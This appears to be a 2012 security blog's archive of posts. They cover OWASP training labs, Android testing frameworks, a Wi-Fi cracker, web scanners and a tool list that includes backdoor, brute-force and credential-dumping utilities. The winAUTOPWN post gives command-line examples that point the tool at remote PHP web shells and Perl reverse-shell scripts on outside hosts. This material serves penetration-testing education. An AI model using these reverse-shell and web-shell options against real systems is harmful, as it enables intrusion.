Sunday, December 23, 2012

OWASP - Web Security Training

OWASP - Open Web Application Security Project :

                                               is a open-source application security project. The OWASP community includes corporations, educational organizations, and individuals from around the world. This community works to create freely-available articles, methodologies, documentation, tools, and technologies.


OWASP Testing Guide :

January 2004
–"The OWASP Testing Guide", Version 1.0

July 14, 2004
–"OWASP Web Application Penetration Checklist", Version 1.1



Download Link : OWASP Ver 1.1


December 25, 2006
–"OWASP Testing Guide", Version 2.0
Download Link  MS- DOC Format : OWASP Ver 2.0  
Download Link PDF-Format   : OWASP Ver 2.0
15th September, 2008
–"OWASP Testing Guide", Version 3.0

Download Link MS-PPT Format : OWASP Ver 3.0
Download Link PDF Format : OWASP Ver 3.0

Video Tutorials :

OWASP AppSec Basics :


OWASP SQL Injection :
OWASP Cross Site Scripting :

OWASP Strict Transport Security :

Setting Up OWASP Web Security Learning Lab with OWASP ZAP :


Installation

Required Software

 Setup

  1. Install VirtualBox
  2. Unzip OWASP Broken Web Apps VM into any directory (don't pick restricted directories that require admin or sudo to access)
  3. Open VirtualBox and hit the icon for "New"
    • VM Name and OS Type: Enter name "OWASP-BWA" and select OS "Linux" and Version "Ubuntu"
    • Memory: Default of 512 is fine
    • Virtual Hard Disk: Important Select "Use existing hard disk" and click on the folder.
    • Browse to the unzipped folder contents of the OWASP Broken Web Apps VM. Select "OWASP Broken Web Apps.vmdk" Note: There are similar files ending in -s001. Don't pick those.
    • Click OK to finish VM Setup
  4. Right click on OWASP-BWA in the left pane of the Oracle VM VirtualBox Manager App and select "Settings" (also available via menu Machine->Settings)
    • Go to Settings->Network->Adapter 1.
    • Make sure the checkmark for enabled is checked.
    • Change "Attached to:" from "NAT: to "Host-Only Adapter"
    • Click OK
  5. Right click on OWASP-BWA in the left pane of the Oracle VM VirtualBox Manager App and hit "Start"
  6. After the VM boots the OWASP-BWA login page will provide the following message (the IP address will be similar but not exactly this)

  7. You can access the web apps at http://192.168.56.101

  8. Open a browser on your main machine (not the VM) and go to this URL. It should load a page that starts with "OWASP Broken Web Applications"
  9. Note: You don't need to actually login to the virtual machine. Everything is already running.

Common Errors

  • Boot Up Error Message - Kernel requires feature on CPU: pae
    • Power off VM (not VirtualBox, just VM window)
    • Right click on OWASP-BWA on left side and select "Settings" (also available via menu Machine->Settings)
    • Go to System->Processor and enable PAE
    • Click OK and restart VM
  • Host Only Adapter Shows Error Message and Name says "not selected" with no options
    • Go to the VirtualBox Manager (e.g. the main virtualbox control app, not the individual vm)
    • Go to the VirtualBox->Preferences and then select "Network" (note: these are settings for the virtualbox app overall)
    • There is text box with the title "Host-only Networks:" it is most likely an empty text area and this is the problem
    • Click the plus icon on the right to add a new adapter. You should now see "vboxnet0"
    • Click ok and then go back to the VMs preferences. You should be able to select the hostonly adapter now
  • Keyboard and mouse trapped in VM
    • Mac: Hit the left command button to exit VM control
    • Windows: Left Alt??
    • Simply click back inside the vm with the mouse to regain keyboard control in the VM

Training PDF : Click Here 

OWASP WebScarab Proxy Training : 

                 
                                      WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.

Download

Windows : Click Here  or Alernate Link Click Here

Linux: java -jar ./webscarab-selfcontained-[numbers].jar

Video Training Click Here: http://yehg.net 

Sample Video : 


OWASP Webgoat Training :

                                    WebGoat is a deliberately insecure J2EE web application designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson. 

Download Link : WebGoat V 5.4


Training Documentation :

References to WebGoat documentation or solutions.

Sample Video : 





Hacking-Lab is providing the FREE OWASP TOP 10 : 

         
                                                    hands-on lab as a service to the OWASP Academy Portal and to the OWASP community. Those training material is reviewed and approved by the OWASP Academy Portal Project members in order to set and maintain an OWASP-worthy training quality.

Installation :

These are the simple steps I followed on a Windows 7 laptop.


  • Dowload the Virtual Appliance OVA file to your laptop
  • Download and install the Oracle Virtual Box  application onto your laptop
  • Double-click the .ova file through Windows Explorer and the appliance import process should commence on the Virtual Box application. You should see something like Fig 1:
Fig. 1: Oracle VM Virtual Box Manager
  •  In  theVirtual Box Manager left-hand pane double-click on the LiveCD-Hacking-Lab-V5.55 entry. The LiveCD should start and after a short while  the Welcome screen as shown in Fig 2 should appear.
Fig 2: Welcome Screen
You should be ready to go now at the OWASP Security Training.


Training Videos - Hacking_Lab LiveCD
Video Description
Details
How to use 2 different (attacker/victim) browser instances
Learn how to use 2 different (attacker/victim) browser instances (The Firefox Profiles are available on LiveCD V5.83 and newer)
How to use the ZAP browser in the LiveCD
Tutorial; ZAP Web Inspection Proxy on LiveCD
How to setup a landing page on the LiveCD
Tutorial; ZAP Web Inspection Proxy on LiveCD
How to import LiveCD in VirtualBox 
Learn how to import the LiveCD ova file into VirtualBox
How to import LiveCD in VMware
Learn how to import the LiveCD ova file into VMware
Run Hacking-Lab LiveCD with Vmware 8 workstation
Learn how to use the LiveCD ISO with Vmware 8 workstation
Installation of LiveCD in Vmware 8 workstation
Learn how to install the LiveCD ISO in your Vmware 8 workstation
How to open a root shell
Learn how to open a "root" shell
Server side VDI solution Learn how to use the server side VDI solution

Hacking-Lab Download 

document-open Documents and Videos
document-open Hacking-Lab LiveCD 

Thursday, December 20, 2012

Android Application Vulnerability / Security Assessment Tools & Framework

Android Security Evaluation Framework (ASEF) :
                                               performs this analysis while alerting you about other possible issues. It will make you aware of unusual activities of your apps, will expose vulnerable components and help narrow down suspicious apps for further manual research. The framework will take a set of apps (either pre-installed on a device or as individual APK files) and migrate them to the test suite where it will run it through test cycles on a pre-configured Android Virtual Device (AVD).

                            ASEF is a Open Source Project to perform security analysis of Android Apps by various security measures                         

                            ASEF is an Open Source tool for scanning Android Devices for security evaluation. Users will gain access to security aspects of android apps by using this tool with its default settings. An advanced user can fine-tune this, expand upon this idea by easily integrating more test scenarios, or even find patterns out of the data it already collects. ASEF will provide automated application testing and facilitate a plug and play kind of environment to keep up with the dynamic field of Android Security.

YouTude Videos :

Demo : Running ASEF to test all installed android apps from an android device on an Android Virtual Device



Short Demo : Running ASEF to test all installed android apps from an android device on an another physical android device

 

Download Link : Android Security Evaluation Framework


Tools :

Mercury v1.1 Tool - 

                              bug hunters to find vulnerabilities & write proof-of-concept exploits in Android Application. Simple called as Android Apps Vulnerability Scanner. 

 

                            Mercury is a framework for exploring the Android platform; to find vulnerabilities and share proof-of-concept exploits.

                         Mercury allows you to assume the role of a low-privileged Android app, and to interact with both other apps and the system.
  • Use dynamic analysis on Android applications and devices for quicker security assessments
  • Share publicly known methods of exploitation on Android and proof-of-concept exploits for applications and devices
  • Write custom tests and exploits, using the easy extensions interface
Mercury allows you to:
  1. Interact with the 4 IPC endpoints - activities, broadcast receivers, content providers and services
  2. Use a proper shell that allows you to play with the underlying Linux OS from the point of view of an unprivileged application (you will be amazed at how much you can still see)
  3. Find information on installed packages with optional search filters to allow for better control
  4. Built-in commands that can check application attack vectors on installed applications
  5. Transfer files between the Android device and your computer
  6. Create new modules to exploit your latest finding on Android, and playing with those that others have found
                For those of you interested in vulnerabilities in vendor products, the new version is the start of a collection of these in a framework. The first privilege escalation was included, allowing the escalation to root from Mercury’s unprivileged context. A module was created to check for vulnerabilities in content providers discovered on Samsung devices.

Sample results of running this module on a vulnerable version of the Samsung Galaxy SII is shown below:


Running this on the Samsung Galaxy SIII yields the following:

                               

Security consultants Sample Testing :

                  The first set of vulnerabilities found by the MWR team was done manually by reviewing the AndroidManifest.xml of each package on the phone. With Mercury, a combination of the attacksurface command and the the info command in each section will get you the same results in a tenth of the time. If you are interested in looking for common problems on devices, the scanner modules will be of interest to you. As an example, this is scanner.provider.sqlinjection finding SQL injection flaws in default content providers on an Android 4.0.3 Emulator.



                        Don’t get too excited, these SQL injection vulnerabilities don’t lead to any serious information disclosure, but you get the idea right? Don’t just look at content provider problems because these tools are available. Content providers are the tip of the iceberg! Ask us questions or bounce ideas. Create new modules with Mercury. Go forth and innovate!

   Download Link : Mercury v1.1

 

 





Wednesday, December 19, 2012

Fern Wifi Cracker - Wireless Penetration Testing Tool

Fern Wifi Cracker :
                       is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks

                          

Features


Fern Wifi Cracker currently supports the following features:
  • WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
  • WPA/WPA2 Cracking with Dictionary or WPS based attacks
  • Automatic saving of key in database on successful crack
  • Automatic Access Point Attack System
  • Session Hijacking (Passive and Ethernet Modes)
  • Access Point MAC Address Geo Location Tracking
  • Internal MITM Engine
  • Bruteforce Attacks (HTTP,HTTPS,TELNET,FTP)
  • Update Support

Operating System Supported

The Software runs on any Linux machine with the programs prerequisites, But the program has been tested on the following Linux based operating systems:

Prerequisites

The Program requires the following to run properly:
The following dependencies can be installed using the Debian package installer command on Debian based systems using "apt-get install program" or otherwise downloaded and installed manually

    Installation

    Installation on Debian Package supported systems:

    root@host:~# dpkg -i Fern-Wifi-Cracker_1.6_all.deb



    Screenshot :

    Aim 

    • Crack the Wifi using Fern Wifi Cracker . 

    HOW TO OPEN FERN-WIFI-CRACKER

    • To open fern , follow the steps - 
    • Backtrack > Exploitation Tools > Wireless Exploitation Tools >WLAN Exploitation >fern-wifi-cracker 
    • See the below image for more details - 

    SELECT INTERFACE

    • First step is to select the interface .
    • Here in my case i have selected wlan0 interfaec .
    • See the below image for more details - 
    SCANNING ACCESS POINT 
    • To scan for Access Point click on the 2nd button ( wifi icon ).
    • See the below image for more details -
    • Once you get the Access Point , various AP's of WEP and WPA are detected .
    • See the below image for more details-

     

    WPA Cracking with WPS Attack:

    Video Tutorial :

    Session Hijacking With Fern Wifi Cracker


    Bruteforcing Routers with Fern-Wifi-Cracker


     
    Download Link : Click Here

    Tuesday, December 18, 2012

    Arachni - Web Application Security Scanner Framework

    Arachni :
                is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. Arachni is smart, it trains itself by learning from the HTTP responses it receives during the audit process.
    Unlike other scanners, Arachni takes into account the dynamic nature of web applications and can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity.

    This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni.








    Currently available modules:

    • Audit:
      • SQL injection
      • Blind SQL injection using rDiff analysis
      • Blind SQL injection using timing attacks
      • CSRF detection
      • Code injection (PHP, Ruby, Python, JSP, ASP.NET)
      • Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
      • LDAP injection
      • Path traversal
      • Response splitting
      • OS command injection (*nix, Windows)
      • Blind OS command injection using timing attacks (*nix, Windows)
      • Remote file inclusion
      • Unvalidated redirects
      • XPath injection
      • Path XSS
      • URI XSS
      • XSS
      • XSS in event attributes of HTML elements
      • XSS in HTML tags
      • XSS in HTML ‘script’ tags
    • Recon:
      • Allowed HTTP methods
      • Back-up files
      • Common directories
      • Common files
      • HTTP PUT
      • Insufficient Transport Layer Protection for password forms
      • WebDAV detection
      • HTTP TRACE detection
      • Credit Card number disclosure
      • CVS/SVN user disclosure
      • Private IP address disclosure
      • Common backdoors
      • .htaccess LIMIT misconfiguration
      • Interesting responses
      • HTML object grepper
      • E-mail address disclosure
      • US Social Security Number disclosure
      • Forceful directory listing




    Sample Report :






    To scan via the user-friendlier Web User Interface, just run:

    arachni_web_autostart
     
    This will setup a Dispatcher and fire-up the WebUI server for you.

    Then, point your browser to http://localhost:4567, accept the default settings and start the scan.



    Download Link : Click Here


    Wednesday, December 12, 2012

    winAUTOPWN - Automated Vulnerability Testing

    WinAUTOPWN: 

                           is a minimal Interactive Exploit Framework which acts as a frontend for quick systems vulnerability exploitation. It is a collection of remote exploits using which one can compromise vulnerable systems. winAUTOPWN takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535. Open ports are then recognized and exploits applicable to those ports are executed with the aim of gaining a remote shell or the ability to run remote commands in certain cases.


                                       WINDOWS AUTOPWN or winAUTOPWN is an auto shell gaining // security penetration tool. It can also be used to test IDS, IPS and other monitoring sensors/softwares.


                                   Besides the above, winAUTOPWN can also be used as an efficiency testing tool for Intrusion Detection Systems (IDS) and Web Application Filters (WAF). winAUTOPWN has a vast repository of exploits for various Operating systems like Microsoft Windows, Apple MAC OSX, Linux (various), BSD systems as well as for well-known services and daemon software. winAUTOPWN also contains a massive database of Shell Upload Vulnerability, Remote File Inclusion and Remote Command Execution exploits. These can be fired one after the other instantly and this can aide is checking if the WAF is preventing / alerting accordingly against such threats or no. Similarly shell aiming exploits too can be fired up in a row to test the strength and effectiveness of IDS and IPS.

                                    WinAUTOPWN also has a BSD based cousin called bsdAUTOPWN. bsdAUTOPWN is a just like winAUTOPWN but is not an exact recompilation of winAUTOPWN. It has been written from scratch for and on FreeBSD OS to match the power and functionality offered by the Operating System. Like winAUTOPWN, even bsdAUTOPWN has a multi-threaded portscan feature and it too detects open ports and attempts to exploit them accordingly using the available exploits in the arsenal. We’ll come to a detailed discussion about bsdAUTOPWN later.



     
    Windows GUI as well, which takes similar inputs and feeds it to the main winAUTOPWN console:


    How to use command-line in winAUTOPWN ?

    Command-line usage has always been a mark of a power user in any console based penetration testing tool. winAUTOPWN’s entire interactive interface can be pre-fed with values using command line options as explained below :
    • -skipscan This option can force winAUTOPWN to skip the port-scan module and use the file OpenPorts.TXT in the directory. This is a useful feature when you know what open ports are available on your target system. One can just fill in the port numbers and save the file. This is also helpful in situations when you want winAUTOPWN to check for exploits for one or a few particular ports.
      Example winAUTOPWN.exe –skipscan
    • -onlyscan This option can force winAUTOPWN to skip the entire exploit testing modules. Hence, by using this module winAUTOPWN will only perform a PortScan and will exit after printing the list of OpenPorts .
      Example winAUTOPWN.exe –onlyscan
    • -targetIP This option can be used to provide the Target IP address of the system being tested. Ensure that you specify the IP address after it.
      Example winAUTOPWN.exe –targetIP 192.168.3.3
    • -targetHOST This option can be used to provide the Target Hostname of the system being tested. Ensure that you specify the complete Netbios name for Windows systems on LAN and the entire domain name for Target Systems on WAN.
      Example winAUTOPWN.exe –targetHOST SYSTEM-2
      winAUTOPWN.exe –targetHOST www.somewebsite9.com
    • -attackerIP This option can be used to provide your own IP, which is the Attacker’s IP address of the system from where winAUTOPWN is being run. Ensure that you specify the IP address after it.
      Example winAUTOPWN.exe –attackerIP 192.168.3.34
    • -cmsPATH This option can be used to specify the Content Management System directory name in the URL. Generally this is the first directory name right after the end of the Domain name or the IP address. Ensure that you specify the correct cmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –cmsPATH /xampp
    • -actcmsPATH This option can be used to specify the Actual Content Management System or the internal Actual CMS Path of the URL. Generally this is not visible in the URL. A lot of times CMS packages installed on the webserver have a default path making it easily guessable. Ensure that you specify the correct actcmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –actcmsPATH /Applications/xampp
      winAUTOPWN.exe –actcmsPATH /opt/xampp
    • -phpshellPATH This option can be used specify the path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. There is a default encoded PHP web-shell path. To change it, ensure that you specify the correct phpshellPATH which accepts a variable named CMD to execute system commands. The GET request should look like http://shellp.ath/shell.php?CMD=ls
      You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –phpshellPATH http://website.moc/folder/r57.txt
    • -actphpshellPATH This option can be used specify the actual internal path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –actphpshellPATH /var/log/tmp
    • -cmsadminUSR This option can be used specify the administrator /admin username if known. This is required for a few web-app exploits to work correctly. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –cmsadminUSR admin9
    • -ftpUSR This option can be used specify the FTP User name if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Username.
      Example winAUTOPWN.exe –ftpUSR user6
    • -ftpPASSWD This option can be used specify the FTP Password if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Password.
      Example winAUTOPWN.exe –ftpPASSWD S3cR37P@55W0rD
    • -perlrevshURL This option can be used specify the path of a remote Perl script which should be able to send a /bin/sh or an equivalent shell to a remote IP. The script should ideally have the capability to be invoked as perl . Note that the remote_IP will be your IP to which your target will connect and the remote_port will be a port opened on your IP. You do not have to worry about providing parameters to the Perl file or opening the port locally, winAUTOPWN will automatically handle it, because that’s what WINDOWS AUTOPWN actually means. Also note that any Perl script with these capabilities can be used and can be hosted on any webserver. This option just needs the path to this Perl file. This Perl script will be pointed to and used in a few exploits in which a remote connect back shell is used as a payload. There is a default Perl shell path encoded so if you have no clue or an online resource, you can leave this option blank and winAUTOPWN will try to handle it on its own.
      Example winAUTOPWN.exe –perlrevshURL http://website.moc/various/reverse-shell.pl
    • -mailFROM This option can be used to specify the sender’s email address to be used in a few SMTP exploits. This field has a default sender’s email address crafted by winAUTOPWN. It is always root@ where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
      Example winAUTOPWN.exe –mailFROM admin@some.web.info
    • -mailTO This option can be used specify the receiver’s email address to be used in a few SMTP Exploits. This field has a default receiver’s email address crafted by winAUTOPWN. It is always postmaster@ where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
      Example winAUTOPWN.exe –mailTO postmaster@some.web.info
    • -proxyIP This option can be used to provide the Proxy Server IP address. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy IP address after it.
      Example winAUTOPWN.exe –proxyIP 192.168.3.80
    • -proxyPORT This option can be used to provide the Proxy Server Port Number. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy Port Number address after it.
      Example winAUTOPWN.exe –proxyIP 8080


      What are the other WELF Scripting Terminologies?

      can be , , OR (for exe files)
      is the filename of the Exploit. Ex: exploitname.exe
      is your Target’s IP address. Ex: 10.40.140.1
      is your Target’s Hostname. Ex: www.somegate.com OR TSUNAMI-MP11
      is your IP. Ex: 10.40.140.144
      is the Target CMS Path. Ex: /awstats
      is the Actual CMS Path on the disk. Ex: /usr/home/www/awstats
      is an online URL for a php shell. Ex: http://www.shell.com/phpshell.txt
      is a admin username for the Target CMS.
      is FTP/CMS Username
      is FTP/CMS Password.
      is Proxy IP address to be used for some exploits to pass through
      is Proxy Port Number to be used for some exploits to pass through
      is the CMS Path with a trailing slah. Ex: /awstats/
      is the Actual CMS Path on the disk with a trailing slash. Ex: /usr/home/www/awstats/
      is the typical complete address of the Target Hostname alongwith the CMS Path. Ex: www.somesite.com/awstats<
      is the typical complete address of the Target Hostname alongwith the CMS Path with a trailing slash. Ex: www.somesite.com/awstats/
      is the CMS path following the standard http:// . Ex: http://www.somesite.com/awstats
      is the Target HostName following the standard http:// . Ex: http://www.somesite.com
      is the online URL for a perl reverse connect script. Ex. http://vrac.fifi.be/warehouse/various/reverse-shell.pl
      is the sender’s email address to be used in a few SMTP exploits.
      is the receiver’s email address to be used in a few SMTP exploits.
      Sample welf script (myWELFexploits.txt) with three exploits to be loaded:
      PERL webframe_0.76_RFI(c99)-xplt_method3.pl -vuln -shell ^^^^
      PYTHON Steamcast(HTTP_Request)_(SEH)_Rem_Buf_Ovrflw_xplt.py 80 100 ^^^^
      bitweaver_firecmd.exe ^^^^

      To run the above script, as mentioned earlier run
      winAUTOPWN.exe –welf myWELFexploits.txt 


    Download Link : Click Here

    Back-up Link : Click Here

    Reference link : Click Here

    Direct Link : Click Here

    ScoopyNG - VMware detection tool

    ScoopyNG:
                 combines the detection tricks of Scoopy Doo and Jerry as well as some new techniques to determine if a current OS is running inside a VMware Virtual Machine (VM) or on a native system.

    ScoopyNG should work on all modern uni-, multi- and multi-core cpu's.




    ScoopyNG is able to detect VMware even if "anti-detection-mechanisms" are deployed.

    Download : 
                     Windows Version: ScoopyNG v1.0

    Wednesday, October 17, 2012

    ServerShield - Open Source Linux Hardening Tool

    Server Shield:
                is a lightweight method of protecting and hardening your Linux server. It is easy to install, hard to mess up, and makes your server instantly and effortlessly resistant to many basic and advanced attacks

    Automatic security updates are enabled by default, including the self-updating of Server Shield. If you are running a modified version of Server Shield you should turn self-updating off so your changes don't get overwritten. Support for servers with multiple IP addresses will be added soon.

    Features

    • Slowloris Protection
    • Firewall Hardening
    • TCP Hardening
    • ICMP/Ping Flood Protection
    • DoS Protection
    • Spoof Protection
    • FTP/SSH Bruteforce Protection
    • Automatic Security Updates
    • Disables Bash History
    • DNS Amplification Protection

    Installation

    git clone https://github.com/Brian-Holt/server-shield
    
    cd server-shield;chmod +x sshield;mv sshield /etc/init.d
    
    /etc/init.d/sshield start    
    

    Requirements

    Server Shield depends on several pieces of open source software to function properly. If yum is available, the following packages will be silently installed and kept up to date:
    • yum-security
    • iptables
    • nmap
    • net-tools
    • sed
    • gawk
    • git
    • apache-devel
     Download Link : Click Here

     Reference Link : Click Here

    Friday, August 24, 2012

    NmapSI4 - Port Scanner ( Nmap GUI )

    NmapSI4 :

                 Qt4-based Gui Tools with the design goals to provide a complete Nmap GUI interface for Users, in order to management all options of this powerful security net Port & Vulnerability Scanner!









    Features


    • Traceroute support with Nmap
    • Host Lookup with internal implementation or dig.
    • Search services vulnerabilities with Webkit dedicated browser.
    • Full Nmap NSE support.
    • Search network IPS with "Network Discover" tool.
    • Support for create scan user profile.
    • Host scan with Nmap.

     Snapshots :





    Download Link :

    Google Code : Click Here
    Source Forge : Click Here

    Thanks To ALL .


    Sunday, August 19, 2012

    2012 - Information Security Free / open source Tools

    Information Security tools  List:

                                             You can find a lot of security tools on the internet. But it is hard to find the right tool for the right job. Here you will be able to download firewall analyzers and several security tools.
    If you believe we missed out on a security tool you can send us an message or simply post it as an comment.

    Real time protection

    Avast! Free
    Ad-Aware Free
    AVG Free
    Panda Cloud Free
    Avira free antivirus Free
    Microsoft Security Essentials Free
    Comodo Free
    Fprot (with Returnil) Free
    PC Tools Free Free
    FortiClient Lite Free
    Unthreat Antivirus Free
    Preventon Free
    Rising Free
    Zillya! Free
    NANO Free
    Digital Defender Free
    ClearSight Free
    Zoner Free
    BkavHome Free
    CMC Infosec Free
    Clam Sentinel Free
    Moon Secure Free
    ZenOK Free
    Ainvo Antivirus Free

    Portable anti-virus programs

    DrWeb cureit
    Emsisoft Emergency USB Stick files
    Avira DE-Cleaner
    Microsoft Safety Scanner
    AVZ / AVZ database
    Norman malware cleaner
    Superantispyware
    Panda ActiveScan Cleaner
    Trendmicro Sysclean
    NoVirusThanks
    ArcaVir MicroScan
    Zillya! Scanner
    Spybot Portable
    ClamWin Portable
    Guardiano Assembler

    Anti Root kit

    TDSS Killer
    Avast MBR Scanner
    Gmer
    RootRepeal
    Kernel Detective
    SpyDllRemover
    VBA anti-rootkit
    Sanity check
    Rootkit Unhooker
    Bitdefender Bootkit Removal Tool
    RootkitRemover
    mbr tool
    catchme
    Rootkitty
    Kill bootkits
    Hypersight Rootkit Detector
    Rkdetector

    Firewall analyzer

    Security is effective when you know what is going on in your environment. The most of us protect ourselves with Firewalls, IDS, IPS and multiple monitor tools.
    These devices and tools all create logfiles that can be analyzed to
    Software Free / Paid Download link
    Firemon Paid http://www.firemon.com
    Barracudanetworks Paid http://www.barracudanetworks.com
    Splunk Paid http://www.splunk.com

    Monitor tools

    If you want to monitor your environment you can use these monitor tools to find out what is happening in your environment.
    Software FREE / Paid Download link
    Zenoss Core Free http://community.zenoss.org/
    NTA Monitor Free http://www.nta-monitor.com/tools/ike-scan/

    Sniffers

    Do you need to analyze an packet? You can use this packet analyzers to sniff packets that cross your network. You can analyze network problems, detect network intrusion attempts and more.
    Software Free / Paid Download link
    Wireshark Free http://www.wireshark.org
    NMAP Free http://nmap.org/

    Code Review Tools

    Tools to review code.
    Software Free / Paid Download link
    Rough Auditing Tool for Security Free https://www.fortify.com

    Config Review Tools

    Tools to review config files.
    Software Free / Paid Download link
    Apache Benchmark Free http://www.cisecurity.org/
    Microsoft Best Practice Analyzer Paid http://www.microsoft.com

    Database Tools

    Software Free / Paid Download link
    SQL Server Express Utility Free http://www.microsoft.com
    MySQL Command-Line Tool Free http://dev.mysql.com/
    Leviathan Free http://leviathan.sourceforge.net/
    WinSQL without installer Free http://web.synametrics.com/rawfiles.htm

    Debugging Tools

    Software Free / Paid Download link
    OllyDbg Free http://www.ollydbg.de/
    Free
    Free
    Free

    Forensic Tools

    Software Free / Paid Download link
    Mandiant Red Curtain Free http://www.mandiant.com/
    Mandiant Red Line Free http://www.mandiant.com/
    Free
    Free

    Fuzzer Tools

    Software Free / Paid Download link
    Skipfish Free http://code.google.com/p/skipfish/
    WSFuzzer Project Free https://www.owasp.org/
    FileFuzz Free http://www.securiteam.com/tools
    Fuzzdb Free http://code.google.com/p/fuzzdb/

    SAP tools

    Software Free / Paid Download link
    SAPYTO Free http://www.security-database.com/

    Backdoor Tools

    Software Free / Paid Download link
    TINI Free http://ntsecurity.nu/toolbox/tini/

    Brute Force Tools

    Software Free / Paid Download link
    Hydra Brute Force Utility Free http://www.madirish.net/
    BRUTUS Free http://www.hoobie.net/brutus/
    TSGrinder Free http://www.hammerofgod.com/
    Patator Free http://code.google.com/p/patator/

    Truecrack Password cracking for truecrypt encrypted volume files click here

    Interception Tools

    Software Free / Paid Download link
    Echomirage Free http://www.bindshell.net/tools/

    Password Cracking Tools

    Software Free / Paid Download link
    Cain & Abel Free http://www.oxid.it/cain.html
    John the Ripper Free http://www.openwall.com/john/
    Ophcrack Free http://ophcrack.sourceforge.net/

    Password Retrieval Tools

    Have you lost your password and you need to retrieve your password? Then take a look at these password retrieval tools.
    Software Free / Paid Download link
    Creddump Free http://code.google.com/p/creddump/
    FGdump Free http://www.foofus.net/~fizzgig/fgdump/
    Pass-The-Hash toolkit Free http://oss.coresecurity.com/
    PWdump Free http://www.foofus.net/~fizzgig/pwdump/

    Token Impersionation Tools

    Software Free / Paid Download link
    Incognito Free http://sourceforge.net/projects/incognito/
    Pass-The-Hash toolkit Free http://oss.coresecurity.com/
    Windows Credentials Editor Free http://www.ampliasecurity.com/research.html

    LIVE CD's

    Software Free / Paid Download link
    Backtrack Free http://www.backtrack-linux.org/
    Hiren Free http://www.hiren.info/pages/bootcd

    Great Tool resources

    Software Free / Paid Download link
    HackArmoury Free http://hackarmoury.com/tools
    Microsoft Free http://www.microsoft.com/download/
    Phenoelit Free http://phenoelit.org/fr/tools.html
    techsupportalert Free Massive tools list

    Kaspersky Free Tools

    Kaspersky Virus Removal Tool free Virus Removal Tool is a utility designed to remove all types of infections from your computer. It implies effective algorithms of detection used by Kaspersky Anti-Virus and AVZ. It cannot substitute a resident antivirus application.

    http://www.kaspersky.com/antivirus-removal-tool-register
    Kaspersky Rescue Disk 10 free Kaspersky Rescue Disk is designed to scan, disinfect and restore infected operating systems. It should be used when it is impossible to boot the operating system.

    http://rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso
    Kaspersky

    Security Scan
    free Kaspersky Security Scan provides a free-of-charge, easy way to find viruses and other threats that may be hidden on your PC… plus get advice on your PC’s security status.

    http://products.kaspersky-labs.com/products/multilanguage/special/kss2/kss12.0.1.117mlg_en_ru_fr_de.exe

    Mandiant free tools



    Redline

    Mandiant Redline is a free utility that accelerates the process of triaging hosts suspected of being compromised or infected while supporting in-depth live memory analysis.
    More

    IOC Editor

    Mandiant IOC Editor is a free editor for Indicators of Compromise (IOCs).
    More

    IOC Finder

    Mandiant IOC Finder is a free tool for collecting host system data and reporting the presence of Indicators of Compromise (IOCs).
    More

    Memoryze

    Free memory forensics software designed to help incident responders find evil within live memory.
    More

    Audit Viewer

    Audit Viewer is an open source tool that allows users to examine the results of Memoryze's analysis.
    More

    Highlighter

    Highlighter is designed to help security analysts and system administrators rapidly review log and other structured text files.
    More

    Red Curtain

    Software for incident responders that helps find and analyze unknown malware.
    More

    Web Historian

    Assists users in reviewing websites that are stored in the history files of the most commonly used browsers.
    More

    Research: PdbXtract

    PdbXtract is a tool to help you explore symbolic type information as extracted from Microsoft programming database files.
    More

    Research: Mandiant ApateDNS

    ApateDNS is a tool for controlling DNS responses though an easy to use graphical user interface (GUI).
    More

    Research: Mandiant Find Evil

    A malware discovery tool which uses disassembly to detect packed executables.
    More

    Research: Mandiant Heap Inspector

    Heap Inspector is a heap visualization and analysis tool. It has the ability to collect a process' heaps using both API and raw methods.
    More

    Research: Mandiant Metasploit Forensic Framework

    The Metasploit Forensic Framework (MSFF) is a proof of concept tool that can potentially reconstruct an attacker's meterpreter sessions.
    More

    Research: Mandiant MindSniffer

    MindSniffer is a tool that will allow the user to translate snort signatures to either XML jobs or Python plug-ins that can be used to identify processes containing strings that match snort signatures.
    More

    Research: Mandiant Restore Point Analyzer

    A simple forensic tool to analyze change.log files from restore points to determine the original paths and file names of files stored inside restore points.
    More



    BindShell Tools link
    BeEF
    BeEF is the browser exploitation framework. Its purposes in life is to provide an easily integratable framework to demonstrate the impact of browser and cross-site scripting issues in real-time. The modular structure has focused on making module development a trivial process with the intelligence existing within BeEF. Some of the basic functionality includes Keylogging and Clipboard Theft.
    Become
